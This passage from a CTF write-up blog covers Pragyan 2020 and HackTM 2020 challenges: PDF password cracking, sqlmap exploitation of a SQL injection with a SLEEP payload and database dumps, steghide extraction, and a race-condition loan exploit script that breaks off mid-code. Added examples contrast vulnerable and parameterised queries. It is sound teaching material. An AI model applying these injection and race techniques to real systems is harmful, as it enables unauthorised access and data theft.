<p>Ok, the comment tells us where to look for the information: at the end of the song.</p>
<p>We can open the file in Audacity and switch to the spectrogram view to show the information:</p>
<p><img alt="encuentralo1" src="https://blog.nlegall.fr/images/pragyan/encuentralo1.png"></p>
<p>It looks like Morse code. After writing it all down, we can decode it and get a message:</p>
<div class="highlight"><pre><span></span><code><span class="cp">..-. ..- . .-. --.. .- -..-. -... .-. ..- - . -..-. -.. . -..-. -.-. .. -. -.-. --- -..-. -.. .. --. .. - --- ... -..-. -.-. --- -. -..-. -- .. -. ..- ... -.-. ..- .-.. .- ... -..-. -.-- -..-. -. ..- -- . .-. --- ...</span>
</code></pre></div>
<p><code>FUERZA/BRUTE/DE/CINCO/DIGITOS/CON/MINUSCULAS/Y/NUMEROS</code></p>
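<p>Decoding a transcription like this by hand is error-prone, and the en and em dashes a blog engine substitutes for "--" and "---" silently corrupt it. As an added example that is not part of the write-up, here is a small Morse decoder that handles the "-..-." slash the message uses between words, refuses typographic dashes instead of guessing, and is run on the message above re-typed in plain ASCII (a constructed transcription built from the decoded text):</p>

```python
# Added example, not part of the write-up: a Morse decoder for the format
# read off the spectrogram (one space between letters, "-..-." as the slash
# the message uses between words, three spaces between ordinary words).

MORSE_TO_CHAR = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
    "-..-.": "/", ".-.-.-": ".", "--..--": ",", "..--..": "?",
}

# Typographic dashes a blog engine substitutes for "--" and "---" cannot be
# mapped back unambiguously, so refuse them instead of guessing.
BAD_DASHES = "\u2013\u2014"

# The write-up's message, re-typed in plain ASCII from its decoded text
# (constructed transcription, not the characters the page itself shows).
SPECTROGRAM_MESSAGE = (
    "..-. ..- . .-. --.. .- -..-. -... .-. ..- - . -..-. -.. . -..-. "
    "-.-. .. -. -.-. --- -..-. -.. .. --. .. - --- ... -..-. -.-. --- -. -..-. "
    "-- .. -. ..- ... -.-. ..- .-.. .- ... -..-. -.-- -..-. -. ..- -- . .-. --- ..."
)


def decode_morse(message: str) -> str:
    """Decode a Morse string; raise ValueError on unknown or mangled symbols."""
    if any(ch in BAD_DASHES for ch in message):
        raise ValueError("en/em dashes found; re-transcribe with ASCII '-'")
    words = []
    for word in message.strip().split("   "):
        letters = []
        for symbol in word.split(" "):
            if not symbol:
                continue
            if symbol not in MORSE_TO_CHAR:
                raise ValueError(f"unknown Morse symbol {symbol!r}")
            letters.append(MORSE_TO_CHAR[symbol])
        words.append("".join(letters))
    return " ".join(words)


if __name__ == "__main__":
    print(decode_morse(SPECTROGRAM_MESSAGE))
```

Run stand-alone it prints <code>FUERZA/BRUTE/DE/CINCO/DIGITOS/CON/MINUSCULAS/Y/NUMEROS</code>; feeding it the page's rendered line instead raises immediately, which is the point of refusing the dashes.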
<p>We now know what kind of password we are looking for: brute force, five characters, lowercase letters and digits. The tool <code>pdfcrack</code> can be used with the minimal and maximal length (<code>-n</code> and <code>-m</code>) and the character set (<code>-c</code>) of the password.</p>
<div class="highlight"><pre><span></span><code>$ ./pdfcrack -f ../1Hola.pdf -c <span class="s2">"abcdefghifklmnopqrstuvwxyz0123456789"</span> -n <span class="m">5</span> -m <span class="m">5</span>
PDF version <span class="m">1</span>.3
Security Handler: Standard
V: <span class="m">2</span>
R: <span class="m">3</span>
P: -3904
Length: <span class="m">128</span>
Encrypted Metadata: True
FileID: 34ef3f1f94c5a1a642014ddf22af7900
U: 5233de370d2758db5857a2a21592631c00000000000000000000000000000000
O: fc81cb565ad34c0f8d431ec8772e44d7ee7da867715f50294bfe5b23116564c4
Average Speed: <span class="m">28059</span>.7 w/s. Current Word: <span class="s1">'zabma'</span>
<span class="o">[</span>...<span class="o">]</span>
Average Speed: <span class="m">27737</span>.7 w/s. Current Word: <span class="s1">'v3dmz'</span>
Average Speed: <span class="m">28639</span>.5 w/s. Current Word: <span class="s1">'p2nyz'</span>
found user-password: <span class="s1">'x2n1z'</span>
</code></pre></div>
<p>Ok, we got the password for the first PDF. Let's do the same for the two other files: <code>found user-password: '39adz'</code> and <code>found user-password: '8yfa2'</code>.</p>
<p>The two PDFs are the ones used to demonstrate the SHA-1 collision: <a href="https://shattered.io/">https://shattered.io/</a>. The last PDF tells us how to get the flag: <code>SHA1[original files] = base64-decrypt(base64-decrypt(flag))</code>.</p>
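<p>The relation above in Python, as an added example (not the write-up's own code, which uses a shell one-liner): encode a digest the way the challenge expects, and decode a candidate flag back to the digest so it can be checked against a known value. The sample file is a constructed stand-in, not the shattered PDF.</p>

```python
import base64
import hashlib

# Added example, not the write-up's own code: the challenge relation
#   SHA1[original file] = base64-decode(base64-decode(flag))
# done in Python, in both directions, so a candidate flag can be checked
# against a known digest instead of trusting a shell one-liner's quoting.

FLAG_PREFIX = "p_ctf{"


def sha1_hex(data: bytes) -> str:
    """Hex SHA-1 digest of a byte string, i.e. what sha1sum prints."""
    return hashlib.sha1(data).hexdigest()


def encode_flag(sha1_hexdigest: str) -> str:
    """Wrap the hex digest (as ASCII text) in two layers of base64."""
    once = base64.b64encode(sha1_hexdigest.encode("ascii"))
    twice = base64.b64encode(once).decode("ascii")
    return FLAG_PREFIX + twice + "}"


def decode_flag(flag: str) -> str:
    """Strip the two base64 layers and return the hex digest inside the flag."""
    if not (flag.startswith(FLAG_PREFIX) and flag.endswith("}")):
        raise ValueError("not a p_ctf{...} flag")
    inner = flag[len(FLAG_PREFIX):-1]
    # validate=True makes stray characters an error instead of being dropped,
    # so a mangled flag fails loudly rather than decoding to garbage.
    once = base64.b64decode(inner, validate=True)
    return base64.b64decode(once, validate=True).decode("ascii")


def verify_flag(flag: str, expected_sha1_hex: str) -> bool:
    """True when the digest carried by the flag equals the expected one."""
    try:
        return decode_flag(flag).lower() == expected_sha1_hex.lower()
    except (ValueError, UnicodeDecodeError):
        return False


# Constructed sample input (not the shattered PDF): the round trip holds for
# any file because the flag depends only on the digest string.
SAMPLE_FILE = b"%PDF-1.3\n% constructed stand-in for shattered-1.pdf\n"

if __name__ == "__main__":
    digest = sha1_hex(SAMPLE_FILE)
    flag = encode_flag(digest)
    print(flag, verify_flag(flag, digest))
```

Decoding the flag from this write-up with <code>decode_flag</code> gives <code>38762cf7f55934b34d179ae6a4c80cadccbb7f0a</code>, the published SHA-1 that both shattered PDFs share, which is exactly why a collision makes "SHA1[original files]" a single value.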
<p>So, download the original <a href="https://shattered.io/static/shattered-1.pdf">file</a>, compute its SHA-1 and base64-encode the digest twice:</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"p_ctf{</span><span class="k">$(</span><span class="nb">echo</span> -n <span class="k">$(</span><span class="nb">printf</span> <span class="s2">"</span><span class="k">$(</span>sha1sum shattered-1.pdf <span class="p">|</span> sed <span class="s1">'s/^\([^ \t\s[:space:]]\+\).*$/\1/'</span><span class="k">)</span><span class="s2">"</span> <span class="p">|</span> base64<span class="k">)</span> <span class="p">|</span> base64<span class="k">)</span><span class="s2">}"</span>
p_ctf<span class="o">{</span><span class="nv">TXpnM05qSmpaamRtTlRVNU16UmlNelJrTVRjNVlXVTJZVFJqT0RCallXUmpZMkppTjJZd1lRPT0</span><span class="o">=}</span>
</code></pre></div>
<p><em><a href="/pragyan-2020-pandora.html">Pragyan 2020 - Pandora</a></em> (nlegall, 2020-02-26)</p>
<div class="highlight"><pre><span></span><code>Solved by: 7%
First solvers: nguyendqn
Jake in pandora needs to save Naʼvi from Human invasion. But he is not sure human`s army base`s locations.
Help him find those location so that he can take them down before they start their move.
link: http://ctf.pragyan.org:14000
</code></pre></div>
<p>We need to create an account with a username and password (<code>admin123</code> here). Once logged in, the web page tells us that we don't have any messages.</p>
<p>A quick test of the <code>NAME</code> parameter with <code>' OR 1=1 --'</code> shows all the messages. Great! We found a SQL injection. Let's try to get all the data with <code>sqlmap</code>.</p>
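<p>Why that quote returns every row, as an added example (not the challenge's code; its PHP is never shown): a stand-in for the <code>NAME</code> lookup built by string concatenation beside the parameterised version, over a constructed table, plus a crude request-log heuristic for the payload shapes seen in this write-up. The table name, rows and function names are assumptions for the demo.</p>

```python
import sqlite3

# Added example, not the challenge's code (its PHP is never shown): a
# stand-in for the profile lookup behind the NAME parameter, first built by
# string concatenation and then with a bound parameter. Table and rows are
# constructed for the demo.


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE pandoramsg (owner TEXT, body TEXT);
        INSERT INTO pandoramsg VALUES ('jake', 'meet at the hometree');
        INSERT INTO pandoramsg VALUES ('neytiri', 'the sky people are coming');
        INSERT INTO pandoramsg VALUES ('admin123', 'you have no messages');
        """
    )
    return conn


def messages_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    # The request parameter is spliced into the SQL text: the quote in
    # "' OR 1=1 --'" closes the string literal, "OR 1=1" makes the WHERE
    # clause true for every row and "--" comments out the trailing quote.
    query = "SELECT owner, body FROM pandoramsg WHERE owner = '" + name + "'"
    return conn.execute(query).fetchall()


def messages_safe(conn: sqlite3.Connection, name: str) -> list:
    # A bound parameter travels as data and is never parsed as SQL, so the
    # same input simply matches no owner.
    query = "SELECT owner, body FROM pandoramsg WHERE owner = ?"
    return conn.execute(query, (name,)).fetchall()


def looks_like_injection(value: str) -> bool:
    """Crude request-log heuristic for the payload shapes in this write-up
    (tautology, comment marker, time-based SLEEP). It is a detection aid,
    not a replacement for parameterised queries."""
    v = value.lower()
    return "'" in v and ("--" in v or " or " in v or "sleep(" in v)
```

The heuristic flags both the manual probe and the <code>SLEEP(5)</code> payload sqlmap reports below; the real fix is <code>messages_safe</code>, since a time-based blind injection never shows up as an error in the application's own logs.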
<h2>Validate the injection</h2>
<div class="highlight"><pre><span></span><code>$ sqlmap -u <span class="s2">"http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123"</span> --tamper<span class="o">=</span>space2comment -p <span class="s2">"NAME"</span> --cookie<span class="o">=</span><span class="s2">"PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10"</span>
<span class="o">[</span>...<span class="o">]</span>
<span class="o">[</span><span class="m">11</span>:49:19<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> GET parameter <span class="s1">'NAME'</span> appears to be <span class="s1">'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'</span> injectable
it looks like the back-end DBMS is <span class="s1">'MySQL'</span>. Do you want to skip <span class="nb">test</span> payloads specific <span class="k">for</span> other DBMSes? <span class="o">[</span>Y/n<span class="o">]</span> Y
<span class="o">[</span>...<span class="o">]</span>
GET parameter <span class="s1">'NAME'</span> is vulnerable. Do you want to keep testing the others <span class="o">(</span><span class="k">if</span> any<span class="o">)</span>? <span class="o">[</span>y/N<span class="o">]</span>
sqlmap identified the following injection point<span class="o">(</span>s<span class="o">)</span> with a total of <span class="m">80</span> HTTP<span class="o">(</span>s<span class="o">)</span> requests:
---
Parameter: NAME <span class="o">(</span>GET<span class="o">)</span>
Type: time-based blind
Title: MySQL ><span class="o">=</span> <span class="m">5</span>.0.12 AND time-based blind <span class="o">(</span>query SLEEP<span class="o">)</span>
Payload: <span class="nv">success</span><span class="o">=</span>welcome<span class="p">&</span><span class="nv">NAME</span><span class="o">=</span>admin123<span class="s1">' AND (SELECT 5886 FROM (SELECT(SLEEP(5)))YUbz) AND '</span>iTBY<span class="s1">'='</span>iTBY
---
</code></pre></div>
<h2>Dump database</h2>
<div class="highlight"><pre><span></span><code>$ sqlmap -u <span class="s2">"http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123"</span> --tamper<span class="o">=</span>space2comment -p <span class="s2">"NAME"</span> --cookie<span class="o">=</span><span class="s2">"PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10"</span> --dbs
<span class="o">[</span>...<span class="o">]</span>
<span class="o">[</span><span class="m">11</span>:51:01<span class="o">]</span> <span class="o">[</span>WARNING<span class="o">]</span> it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
<span class="k">do</span> you want sqlmap to try to optimize value<span class="o">(</span>s<span class="o">)</span> <span class="k">for</span> DBMS delay responses <span class="o">(</span>option <span class="s1">'--time-sec'</span><span class="o">)</span>? <span class="o">[</span>Y/n<span class="o">]</span>
<span class="o">[</span><span class="m">11</span>:51:16<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">2</span>
<span class="o">[</span><span class="m">11</span>:51:21<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> adjusting <span class="nb">time</span> delay to <span class="m">2</span> seconds due to good response <span class="nb">times</span>
information_schema
<span class="o">[</span><span class="m">11</span>:53:55<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: capture_the_flag
available databases <span class="o">[</span><span class="m">2</span><span class="o">]</span>:
<span class="o">[</span>*<span class="o">]</span> capture_the_flag
<span class="o">[</span>*<span class="o">]</span> information_schema
<span class="o">[</span>...<span class="o">]</span>
</code></pre></div>
<h2>Dump tables</h2>
<div class="highlight"><pre><span></span><code>$ sqlmap -u <span class="s2">"http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123"</span> --tamper<span class="o">=</span>space2comment -p <span class="s2">"NAME"</span> --cookie<span class="o">=</span><span class="s2">"PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10"</span> -D capture_the_flag --tables
<span class="o">[</span>...<span class="o">]</span>
<span class="o">[</span><span class="m">11</span>:58:26<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: pandoralocations
<span class="o">[</span><span class="m">12</span>:00:44<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: pandoramsg
<span class="o">[</span><span class="m">12</span>:01:25<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: pandorausers
Database: capture_the_flag
<span class="o">[</span><span class="m">3</span> tables<span class="o">]</span>
+------------------+
<span class="p">|</span> pandoralocations <span class="p">|</span>
<span class="p">|</span> pandoramsg <span class="p">|</span>
<span class="p">|</span> pandorausers <span class="p">|</span>
+------------------+
</code></pre></div>
<h2>Dump data</h2>
<div class="highlight"><pre><span></span><code>$ sqlmap -u <span class="s2">"http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123"</span> --tamper<span class="o">=</span>space2comment -p <span class="s2">"NAME"</span> --cookie<span class="o">=</span><span class="s2">"PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10"</span> -D capture_the_flag -T pandoralocations --dump
<span class="o">[</span>...<span class="o">]</span>
Database: capture_the_flag
Table: pandoralocations
<span class="o">[</span><span class="m">3</span> entries<span class="o">]</span>
+-------+----------------------------------------+-----------+
<span class="p">|</span> base <span class="p">|</span> latitude <span class="p">|</span> longitude <span class="p">|</span>
+-------+----------------------------------------+-----------+
<span class="p">|</span> base1 <span class="p">|</span> <span class="m">10</span>.0054 N <span class="p">|</span> <span class="m">45</span>.0245E <span class="p">|</span>
<span class="p">|</span> base2 <span class="p">|</span> p_ctf<span class="o">{</span>4vengers_455emb1e_0ne_l45t_t1me<span class="o">}</span> <span class="p">|</span> <span class="m">56</span>.0245e <span class="p">|</span>
<span class="p">|</span> base3 <span class="p">|</span> <span class="m">45</span>.9999 S <span class="p">|</span> <span class="m">66</span>.04578W <span class="p">|</span>
+-------+----------------------------------------+-----------+
</code></pre></div>
<p>YEAH! We finally got the flag: <code>p_ctf{4vengers_455emb1e_0ne_l45t_t1me}</code>.</p>
<p><em><a href="/pragyan-2020-pretty-peculiar-pokemon.html">Pragyan 2020 - Pretty Peculiar Pokemon</a></em> (nlegall, 2020-02-26)</p>
<div class="highlight"><pre><span></span><code>Pretty Peculiar Pokemon (150pts)
Solved by: 12%
First solvers: metusec
Ash is on his mission to become world's best pokemon master. On his way he finds an amazing pokemon named charlizard, which he intends to catch in his pokeball. But he finds out that the last pokeball he had was missing. Maybe some pokemon took it. Can you help ash to find that hidden pokemon to get his pokeball back?
Here's a file you will need on this mission.
But try to find the perfect path, it can be a "timewaste", i assure you.
</code></pre></div>
<p>We have an archive with a lot of files inside:</p>
<div class="highlight"><pre><span></span><code>tree
.
├── pokemon
│ ├── abomasnow.png
│ ├── abra.png
│ ├── absol.png
<span class="o">[</span>...<span class="o">]</span>
│ ├── .pikachu
│ ├── pikachu.png
<span class="o">[</span>...<span class="o">]</span>
│ ├── zweilous.png
│ └── zygarde-50.png
└── pokemondata.pdf
<span class="m">1</span> directory, <span class="m">810</span> files
</code></pre></div>
<p>We need to open the first PDF, <code>pokemondata.pdf</code>, which asks for a password. A word is quoted in the description ("timewaste"). Let's try it. And it works!</p>
<div class="highlight"><pre><span></span><code><span class="err">|Name|Type1|Type2|</span>
<span class="err">|---|---|---|</span>
<span class="err">|bulbasaur|Grass|Poison|</span>
<span class="err">|ivysaur|Grass|Poison|</span>
<span class="err">|venusaur|Grass|Poison|</span>
</code></pre></div>
<p>It's 18 pages of Pokemon names and their types. But one line is strange: <code>bGV0bWVzbGVlcA==</code> (page 18).</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"bGV0bWVzbGVlcA=="</span> <span class="p">|</span> base64 -d
letmesleep
</code></pre></div>
<p>Hmm, a new word. Maybe a password for another PDF or file. We found a hidden folder <code>.pikachu</code> with a password-protected PDF, <code>may.pdf</code>. But this word doesn't work on it.</p>
<p>Maybe something is hidden in one of the Pokemon pictures. Let's sort them by size.</p>
<div class="highlight"><pre><span></span><code>$ ls -lSh
total <span class="m">3936</span>
-rw-r--r-- <span class="m">1</span> nlegall nlegall 68K févr. <span class="m">23</span> <span class="m">03</span>:24 jigglypuff.png
</code></pre></div>
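<p>Sorting with <code>ls -lSh</code> works for one directory, but it skips dotfiles and needs a human to spot the outlier. As an added example (not from the write-up), the same triage as a script: walk the tree including hidden entries, flag files far above the median size, and list the dot-prefixed names. The demo tree it builds is constructed to mirror the archive's shape; the 5x factor and the function names are assumptions.</p>

```python
import os
import statistics
import tempfile

# Added example, not from the write-up: the `ls -lSh` triage as a script.
# os.walk sees dot-prefixed entries that `ls` and `tree` hide by default, and
# a median-based threshold flags the oversized file without a human scanning
# the listing. The demo tree and the 5x factor are constructed for the demo.


def scan_sizes(root: str) -> dict:
    """{path: size} for every regular file under root, hidden ones included."""
    sizes = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.isfile(path):
                sizes[path] = os.path.getsize(path)
    return sizes


def size_outliers(sizes: dict, factor: float = 5.0) -> list:
    """(path, size) pairs at least `factor` times the median, largest first."""
    if not sizes:
        return []
    median = statistics.median(sizes.values())
    flagged = [(p, s) for p, s in sizes.items() if s >= factor * median]
    return sorted(flagged, key=lambda ps: ps[1], reverse=True)


def hidden_entries(root: str) -> list:
    """Dot-prefixed files or directories anywhere under root."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            if name.startswith("."):
                found.append(os.path.join(dirpath, name))
    return sorted(found)


def build_demo_tree(root: str) -> None:
    """Constructed stand-in for the archive: many ~3K sprites, one file far
    larger than its siblings, and one hidden directory holding a PDF."""
    sprites = os.path.join(root, "pokemon")
    os.makedirs(os.path.join(sprites, ".pikachu"), exist_ok=True)
    for i in range(20):
        with open(os.path.join(sprites, f"sprite{i:02d}.png"), "wb") as f:
            f.write(b"\x89PNG" + bytes(3000))
    with open(os.path.join(sprites, "jigglypuff.png"), "wb") as f:
        f.write(b"\x89PNG" + bytes(68 * 1024))
    with open(os.path.join(sprites, ".pikachu", "may.pdf"), "wb") as f:
        f.write(b"%PDF-1.4\n" + bytes(2000))


def run_demo() -> tuple:
    """Build the demo tree in a temp dir; return (outlier names, hidden paths)."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        outliers = [os.path.basename(p) for p, _ in size_outliers(scan_sizes(root))]
        hidden = [os.path.relpath(p, root).replace(os.sep, "/") for p in hidden_entries(root)]
    return outliers, hidden


if __name__ == "__main__":
    print(run_demo())
```

On the demo tree this reports <code>jigglypuff.png</code> as the only outlier and <code>pokemon/.pikachu</code> as the hidden entry, the two leads the write-up found by hand.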
<p>Ok, that's a huge size for a small picture, and all the other files are around 3K. Maybe the word from before can be used with <code>steghide</code> to extract an extra file:</p>
<div class="highlight"><pre><span></span><code>$ steghide extract -sf jigglypuff.png
Enter passphrase:
wrote extracted data to <span class="s2">"galf.txt"</span>.
$ cat galf.txt
Congrats you found the hidden flag
p_ctf<span class="o">{</span>j!gglypuff_w@n1<span class="nv">$_10_$leep_n0w</span><span class="o">}</span>
</code></pre></div>
<p><em><a href="/pragyan-2020-up-can-be-down.html">Pragyan 2020 - Up can be Down</a></em> (nlegall, 2020-02-26)</p>
<div class="highlight"><pre><span></span><code>Solved by: 22%
First solvers: x0r19x91
Mr. Robot is being sent to future. But accidently he lost his passkey which he needs to activate the Time Machine. But he is smart and had already asked Elliot to save the key inside a file to use it in such conditions but safely so that others can't retrieve it easily. Can you help Mr. Robot to find the secret passkey from the file?
Open ME!!!
</code></pre></div>
<p>As usual, we can take a look at the metadata of the image:</p>
<div class="highlight"><pre><span></span><code>$ exiftool mrRobot.jpg
<span class="o">[</span>...<span class="o">]</span>
Format : U29tZSBTSEEgbWF5YmUhISEh
Comment : c82358dfb202ce9cfddc34e13d403fa3
Image Width : <span class="m">2560</span>
<span class="o">[</span>...<span class="o">]</span>
</code></pre></div>
<p>Hmm, a strange comment inside. We can use <a href="https://crackstation.net/">crackstation</a> to get the clear text if the hash is a known one. The website gave us a result:</p>
<p><code>c82358dfb202ce9cfddc34e13d403fa3 sha256 avium</code></p>
<p>We can now use this clear-text word to extract the hidden information from the file:</p>
<div class="highlight"><pre><span></span><code>$ steghide extract -sf mrRobot.jpg
Enter passphrase:
wrote extracted data to <span class="s2">"flag.txt"</span>.
$ cat flag.txt
Congrats! This was way too wasy :P
This is the key:
p_ctf<span class="o">{</span>s0rry_6ut_1_@m_n0t_@_r060t<span class="o">}</span>
</code></pre></div>
<p><em><a href="/pragyan-2020-welcome.html">Pragyan 2020 - Welcome!!!</a></em> (nlegall, 2020-02-26)</p>
<p><em>solves : 123</em></p>
<div class="highlight"><pre><span></span><code># Welcome!!! (10pts)
Solved by: 38%
First solvers: Balsn
Go and checkout our bot in case you are bored and get some bonus points: https://t.me/pctf_bot
</code></pre></div>
<p>We need to connect to the bot from Telegram.</p>
<p><img alt="welcome1" src="https://blog.nlegall.fr/images/pragyan/welcome1.png"></p>
<p>Ok, nice bot. Let's try some commands and see what we can get from it.</p>
<p><img alt="welcome2" src="https://blog.nlegall.fr/images/pragyan/welcome2.png"></p>
<p>Oh! The <code>/movie</code> command seems nice. If we look at the first letter of each movie, we can see the beginning of the flag: <code>PCTF</code>.</p>
<div class="highlight"><pre><span></span><code><span class="err">Pulp Fiction</span>
<span class="err">Casablanca</span>
<span class="err">Terminator</span>
<span class="err">Final Destination</span>
<span class="err">Batman Begins</span>
<span class="err">Once Upon A Time In Hollywood</span>
<span class="err">Tomb Raider</span>
<span class="err">Se7en</span>
<span class="err">Aquaman</span>
<span class="err">Ratatouille</span>
<span class="err">Ender's Game</span>
<span class="err">Casino Royale</span>
<span class="err">Oblivion</span>
<span class="err">Oceans 11</span>
<span class="err">Little Women</span>
<span class="err">Aladdin</span>
<span class="err">Finding Nemo</span>
</code></pre></div>
<p>Let's do it with all the names and add the missing characters to get the final flag: <code>p_ctf{bots_are_cool_af}</code>.</p>
<p><em><a href="/hacktm-quals-2020.html">HackTM Quals 2020</a></em> (nlegall, 2020-02-06)</p>
<p><em><a href="https://ctfx.hacktm.ro">HackTM_CTF_2020</a> - <a href="https://ctftime.org/event/956">CTFTime</a></em></p>
<p>This CTF is really good and the challenges are well made. However, it's not the best one to start with. The level is quite hard, but you can learn a lot from it. The crypto and pwn/reverse challenges use a lot of really good tricks. If you are quite familiar with CTFs, I recommend giving the next edition a try.</p>
<p><img alt="bilan.png" src="https://blog.nlegall.fr/images/hacktm/profile.png"></p>
<h2>Crypto</h2>
<ul>
<li><a href="/hacktm-quals20-rsa-is-easy-1.html">RSA is easy #1</a></li>
<li><a href="/hacktm-quals20-rsa-is-easy-2.html">RSA is easy #2</a></li>
<li><a href="/hacktm-quals20-prison-break.html">Prison Break</a></li>
</ul>
<h2>misc</h2>
<ul>
<li><a href="/hacktm-quals20-romanian-gibberish.html">Romanian Gibberish</a></li>
<li><a href="/hacktm-quals20-the-dragon-sleeps-at-night.html">The dragon sleeps at night</a></li>
</ul>
<h2>web</h2>
<ul>
<li><a href="/hacktm-quals20-my-bank.html">My Bank</a></li>
</ul>
<p><em><a href="/hacktm-quals20-my-bank.html">HackTM Quals20 - My Bank</a></em> (nlegall, 2020-02-06)</p>
<p><em>solves : 70</em></p>
<div class="highlight"><pre><span></span><code>My Bank
280 Points
Who's got my money?
Please abstain from brute-forcing files.
http://178.128.175.6:50090/
Author: nytr0gen
</code></pre></div>
<p>We got a URL that is a login page.</p>
<p><img alt="my_bank1" src="https://blog.nlegall.fr/images/hacktm/mybank_1.png"></p>
<p>We can put any login in the field and we get redirected to the default page. This page allows us to loan some BTC from the bank.</p>
<p><img alt="my_bank2" src="https://blog.nlegall.fr/images/hacktm/mybank_2.png"></p>
<p>This money allows us to buy some goods (Chocolate - 10 tBTC, Python Book - 40 tBTC, WreckTheLine Stickers - 105 tBTC) and the flag for 1337 tBTC.</p>
<p><img alt="my_bank3" src="https://blog.nlegall.fr/images/hacktm/mybank_3.png"></p>
<p>But the first page shows that we can only loan 600 tBTC from the bank. We can't get more.</p>
<p>So, we need to trick the server: send loan requests faster than it checks the remaining allowed loan amount, so that several of them pass the check before any is counted. I made a Python script that performs a total of 15 requests. It should allow us to buy the flag.</p>
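<p>Why the trick works, as an added example that is neither the author's script below nor the challenge's server code: a constructed model of the loan endpoint with the check-then-act window left open, beside the same endpoint with check and update done atomically. <code>LIMIT</code>, the latency constant and the class names are assumptions for the demo.</p>

```python
import threading
import time
from concurrent.futures import ThreadPoolExecutor

# Added example, neither the author's script nor the challenge's server code:
# a constructed model of the loan endpoint. The vulnerable desk reads the
# running total, waits for a "database round trip", then writes, so requests
# in flight at the same time all see the same stale total. The atomic desk
# holds a lock across check and update; in a real backend the equivalent is
# a conditional UPDATE or a database constraint on the balance.

LIMIT = 600          # max tBTC the bank lends, as stated on the loan page
DB_LATENCY = 0.1     # constructed delay standing in for the query round trip


class LoanDeskVulnerable:
    def __init__(self) -> None:
        self.loaned = 0

    def request_loan(self, amount: int) -> bool:
        if self.loaned + amount > LIMIT:      # check ...
            return False
        time.sleep(DB_LATENCY)                # ... window another request can use ...
        self.loaned += amount                 # ... act: check-then-act race
        return True


class LoanDeskAtomic:
    def __init__(self) -> None:
        self.loaned = 0
        self._lock = threading.Lock()

    def request_loan(self, amount: int) -> bool:
        with self._lock:                      # check and act in one critical section
            if self.loaned + amount > LIMIT:
                return False
            time.sleep(DB_LATENCY)
            self.loaned += amount
            return True


def fire_requests(desk, n: int = 15, amount: int = 100) -> tuple:
    """Send n loan requests concurrently; return (granted, total loaned)."""
    with ThreadPoolExecutor(max_workers=n) as pool:
        granted = sum(pool.map(lambda _: desk.request_loan(amount), range(n)))
    return granted, desk.loaned


if __name__ == "__main__":
    print("vulnerable:", fire_requests(LoanDeskVulnerable()))   # more than 600 lent
    print("atomic:    ", fire_requests(LoanDeskAtomic()))       # (6, 600)
```

With the window open, all 15 requests read a total of 0 and are granted, so the desk lends well past 600; with the lock, exactly six are granted and the seventh onwards are refused, whatever the concurrency.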
<div class="highlight"><pre><span></span><code><span class="kn">from</span> <span class="nn">concurrent.futures</span> <span class="kn">import</span> <span class="n">ThreadPoolExecutor</span> <span class="k">as</span> <span class="n">PoolExecutor</span>
<span class="kn">import</span> <span class="nn">http.client</span><span class="o">,</span> <span class="nn">urllib.parse</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">from</span> <span class="nn">bs4</span> <span class="kn">import</span> <span class="n">BeautifulSoup</span>
<span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="k">def</span> <span class="nf">get_it</span><span class="p">(</span><span class="n">url</span><span class="p">):</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="c1"># always set a timeout when you connect to an external server</span>
        <span class="n">connection</span> <span class="o">=</span> <span class="n">http</span><span class="o">.</span><span class="n">client</span><span class="o">.</span><span class="n">HTTPConnection</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span>
        <span class="n">connection</span><span class="o">.</span><span class="n">request</span><span class="p">(</span><span class="s2">"POST"</span><span class="p">,</span> <span class="s2">"/"</span><span class="p">,</span> <span class="n">params</span><span class="p">,</span> <span class="n">headers</span><span class="p">)</span>
        <span class="n">response</span> <span class="o">=</span> <span class="n">connection</span><span class="o">.</span><span class="n">getresponse</span><span class="p">()</span>
        <span class="k">return</span> <span class="n">response</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
    <span class="k">except</span> <span class="n">socket</span><span class="o">.</span><span class="n">timeout</span><span class="p">:</span>
        <span class="c1"># in a real world scenario you would probably do stuff if the</span>
        <span class="c1"># socket goes into timeout</span>
        <span class="k">pass</span>
<span class="n">URL</span> <span class="o">=</span> <span class="p">[</span>
    <span class="s2">"178.128.175.6:50090"</span>
